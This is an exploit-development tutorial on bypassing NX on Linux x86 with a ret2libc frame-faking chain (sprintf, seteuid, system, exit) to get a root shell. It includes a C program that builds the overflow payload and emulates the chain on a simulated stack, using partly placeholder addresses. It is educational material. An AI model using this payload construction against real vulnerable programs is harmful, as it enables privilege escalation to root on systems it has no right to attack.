Linux (x86) Exploit Development Series 5: Bypassing NX with a ret2libc chain



The obvious way to chain several libc functions would be to place their addresses one after another on the stack, but that does not work: each function also expects its arguments on the stack, in exactly the slots where the next function's address would have to go.

Chaining seteuid, system and exit would let us exploit the vulnerable program 'vuln'. But this is not a straightforward task, because of the following two problems:

  1. Only one function address can sit at the return address: its arguments occupy the slots where the next function's address would have to be placed.
  2. seteuid's argument must be 0, but a zero byte terminates the strcpy that copies our payload, so a zero cannot be part of the payload.

 

Problem 1: To address this problem, Nergal describes two brilliant techniques in his Phrack article on advanced return-into-lib(c) exploits:

  1. ESP Lifting
  2. Frame Faking

Here we look only at frame faking: ESP lifting requires a binary compiled without frame pointers (-fomit-frame-pointer), while our binary (vuln) keeps its frame pointers, so frame faking is the technique that applies.

 

Frame Faking?

In this technique, instead of overwriting the return address directly with a libc function address (seteuid in this example), we overwrite it with the address of a "leave; ret" instruction sequence, and we overwrite the saved EBP with the address of a fake frame that holds the function address and its arguments. This lets the attacker store each function's arguments on the stack without any overlap, so that every libc function in the chain is invoked with its own arguments.

 

How does a "leave; ret" sequence invoke a libc function above it?

To answer this question, we first need to know what "leave" does. A "leave" instruction is equivalent to:

mov esp, ebp           // esp = ebp        (discard the current frame)
pop ebp                // ebp = *esp; esp += 4   (restore the caller's frame pointer)

The "ret" that follows pops the next dword into EIP. Because we overwrote the saved EBP as well as the return address, vuln's own "leave" loads our fake EBP into EBP, and the "leave; ret" we return into then moves ESP to that fake frame, pops the next fake EBP from it, and returns into the libc function address stored right after it. That function sees the following dword as its return address (another "leave; ret") and the dwords after that as its arguments, so each fake frame carries exactly one call and the chain continues frame by frame.

 

Problem 2: In our case seteuid_arg must be zero. But since zero is a bad character, how do we write a zero at stack address 0xbffff210? Nergal discusses a simple solution in the same article: the first few calls in the chain are strcpy calls, each of which copies a NULL byte into seteuid_arg's stack location.

NOTE: Unfortunately, in my libc.so.6 strcpy's address is 0xb7ea6200, i.e. the libc function address itself contains a NULL byte (a bad character!), so strcpy cannot be used to exploit the vulnerable code. sprintf (whose address is 0xb7e6e8d0) is used as a replacement for strcpy: with sprintf, the NULL byte is copied into seteuid_arg's stack location.

Thus the following libc functions are chained to solve the two problems above and obtain a root shell:

sprintf | sprintf | sprintf | sprintf | seteuid | system | exit
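As an added example (not code from the original tutorial or from the sploitfun series it follows), the C program below builds the seven-frame payload listed above and then emulates the "leave; ret" stepping over a simulated 256-byte stack, so the frame layout and the order of calls can be checked without a vulnerable binary. It assumes a 16-byte buffer at 0xbffff200 followed by the saved EBP and return address, a "leave; ret" at 0x0804851f, and seteuid/system/exit at 0xb7f09720/0xb7e61060/0xb7e54be0; all of these are hypothetical placeholders, only the sprintf and strcpy addresses come from the text. It also assumes that each of the four writer calls is sprintf(dst, ""), which writes exactly one NUL byte, so four calls zero the 4-byte seteuid_arg (the text does not say why there are four; this is our reading), and that the empty format string is the NUL terminator strcpy itself appends to the payload. Passing STRCPY_ADDR as the writer instead shows the bad-character problem from the note: payload_is_clean() flags the embedded 0x00 and the emulated chain stops where strcpy truncates the payload.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define STACK_BASE   0xbffff200u   /* a 256-byte slice of the victim's stack, simulated at a hypothetical address */
#define STACK_SIZE   256u
static uint8_t g_stack[STACK_SIZE];
/* SPRINTF_ADDR and STRCPY_ADDR are quoted in the text; the other addresses are hypothetical, NUL-free placeholders. */
#define LEAVE_RET    0x0804851fu   /* a "leave; ret" sequence in the vuln binary */
#define SPRINTF_ADDR 0xb7e6e8d0u
#define STRCPY_ADDR  0xb7ea6200u   /* low byte is 0x00: vuln's strcpy() would truncate the payload here */
#define SETEUID_ADDR 0xb7f09720u
#define SYSTEM_ADDR  0xb7e61060u
#define EXIT_ADDR    0xb7e54be0u
#define BUF_ADDR     STACK_BASE    /* vuln's overflowed buffer; saved ebp and return address follow it */
#define BUF_LEN      16u
/* Bounds-checked view into the simulated stack: an access outside it is treated as a fault. */
static uint8_t *sp(uint32_t addr, uint32_t len) {
    if (addr < STACK_BASE || addr + len > STACK_BASE + STACK_SIZE) { fprintf(stderr, "fault at 0x%08x\n", addr); exit(2); }
    return g_stack + (addr - STACK_BASE);
}
static uint32_t rd32(uint32_t a) { uint32_t v; memcpy(&v, sp(a, 4), 4); return v; }
static uint32_t str_len(uint32_t a) { uint32_t n = 0; while (a + n < STACK_BASE + STACK_SIZE && *sp(a + n, 1)) n++; return n; }
static size_t put32(uint8_t *b, size_t off, uint32_t v) { memcpy(b + off, &v, 4); return off + 4; }
/* One fake frame as the "leave; ret" gadget consumes it: [self+0] next frame (popped into ebp),
 * [self+4] libc function (eaten by ret), [self+8] its return address = the gadget, [self+12..] its args. */
#define FRAME_SIZE(nargs) (12u + 4u * (nargs))
static size_t emit_frame(uint8_t *b, size_t off, uint32_t self, uint32_t func, const uint32_t *args, unsigned nargs) {
    off = put32(b, off, self + FRAME_SIZE(nargs));        /* frames are laid out back to back */
    off = put32(b, off, func);
    off = put32(b, off, LEAVE_RET);
    for (unsigned i = 0; i < nargs; i++) off = put32(b, off, args[i]);
    return off;
}
/* filler | fake_ebp0 | leave;ret | writer x4 | seteuid | system | exit | "/bin/sh"
 * 'writer' (sprintf or strcpy) is called as writer(seteuid_arg + i, "") for i = 0..3, planting the four
 * NUL bytes of seteuid's argument; the "" is strcpy's own terminator at the end of the payload. */
size_t build_payload(uint8_t *out, uint32_t writer) {
    uint32_t f[7], a = BUF_ADDR + BUF_LEN + 8;            /* frame addresses; the first sits right after ret */
    for (int i = 0; i < 7; i++) { f[i] = a; a += FRAME_SIZE(i < 4 ? 2 : 1); }
    uint32_t seteuid_arg = f[4] + 12, binsh = a, empty_str = binsh + 7;
    uint32_t euid = 0x41414141u, status = 0x11111111u;   /* NUL-free fillers; euid is zeroed by the writer calls */
    size_t off = BUF_LEN;
    memset(out, 'A', BUF_LEN);
    off = put32(out, off, f[0]);                           /* saved ebp      <- fake_ebp0 */
    off = put32(out, off, LEAVE_RET);                      /* return address <- leave; ret */
    for (uint32_t i = 0; i < 4; i++) {
        uint32_t args[2] = { seteuid_arg + i, empty_str };
        off = emit_frame(out, off, f[i], writer, args, 2);
    }
    off = emit_frame(out, off, f[4], SETEUID_ADDR, &euid, 1);
    off = emit_frame(out, off, f[5], SYSTEM_ADDR, &binsh, 1);
    off = emit_frame(out, off, f[6], EXIT_ADDR, &status, 1);
    memcpy(out + off, "/bin/sh", 7);
    return off + 7;
}
/* The check to run before sending: the payload travels through strcpy(), so any 0x00 byte truncates it. */
int payload_is_clean(uint32_t writer) {
    uint8_t p[STACK_SIZE]; size_t len = build_payload(p, writer);
    return memchr(p, 0, len) == NULL;
}
struct trace { uint32_t calls[16]; unsigned ncalls; uint32_t seteuid_arg; char system_cmd[16]; } g_trace;
/* Copy the payload like vuln's strcpy (stop at the first NUL), then emulate the CPU from vuln's own "leave; ret"
 * onward. Only the gadget and the chained libc functions are modelled: a libc call returns through [esp] and leaves
 * ebp as it found it (callee-saved). Returns 0 once exit() is reached, -1 when eip lands outside the chain. */
int exploit_demo(uint32_t writer) {
    uint8_t p[STACK_SIZE]; size_t len = build_payload(p, writer), n = 0;
    memset(g_stack, 0, sizeof g_stack); memset(&g_trace, 0, sizeof g_trace);
    while (n < len && p[n] != 0) n++;
    memcpy(sp(BUF_ADDR, (uint32_t)n), p, n);
    uint32_t ebp = BUF_ADDR + BUF_LEN, esp = 0, eip = LEAVE_RET;   /* vuln's ebp -> the overwritten saved ebp */
    for (int step = 0; step < 64; step++) {
        if (eip == LEAVE_RET) {                            /* leave: mov esp, ebp; pop ebp   ret: pop eip */
            esp = ebp; ebp = rd32(esp); eip = rd32(esp + 4); esp += 8;
            continue;
        }
        if (g_trace.ncalls < 16) g_trace.calls[g_trace.ncalls++] = eip;
        uint32_t ret = rd32(esp), a1 = rd32(esp + 4);
        if (eip == SPRINTF_ADDR || eip == STRCPY_ADDR) {   /* both copy a2 up to and including its NUL */
            uint32_t a2 = rd32(esp + 8), l = str_len(a2);
            memcpy(sp(a1, l + 1), sp(a2, l), l); *sp(a1 + l, 1) = 0;
        } else if (eip == SETEUID_ADDR) { g_trace.seteuid_arg = a1;
        } else if (eip == SYSTEM_ADDR) {
            uint32_t l = str_len(a1); if (l > 15) l = 15;
            memcpy(g_trace.system_cmd, sp(a1, l), l); g_trace.system_cmd[l] = 0;
        } else if (eip == EXIT_ADDR) { return 0;           /* exit() never returns */
        } else { return -1; }                              /* not code we planted: a real process would crash here */
        eip = ret; esp += 4;                               /* the callee's own leave; ret */
    }
    return -1;
}

int main(void) {
    int st = exploit_demo(SPRINTF_ADDR);
    printf("sprintf: clean=%d status=%d calls=%u seteuid(%u) system(\"%s\")\n", payload_is_clean(SPRINTF_ADDR), st,
           g_trace.ncalls, (unsigned)g_trace.seteuid_arg, g_trace.system_cmd);
    st = exploit_demo(STRCPY_ADDR);
    printf("strcpy:  clean=%d status=%d calls=%u\n", payload_is_clean(STRCPY_ADDR), st, g_trace.ncalls);
}
```

Compile with something like cc -Wall chain.c and run it: the first line should report a clean payload, 7 calls, seteuid(0) and system("/bin/sh"); the second line reports a payload that is not clean and a chain that never reaches exit(). In a real exploit the frame addresses come from gdb, and every dword placed in the payload (gadget and function addresses, arguments, fillers) has to pass the same NUL check, which is exactly what ruled out strcpy in the note above.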
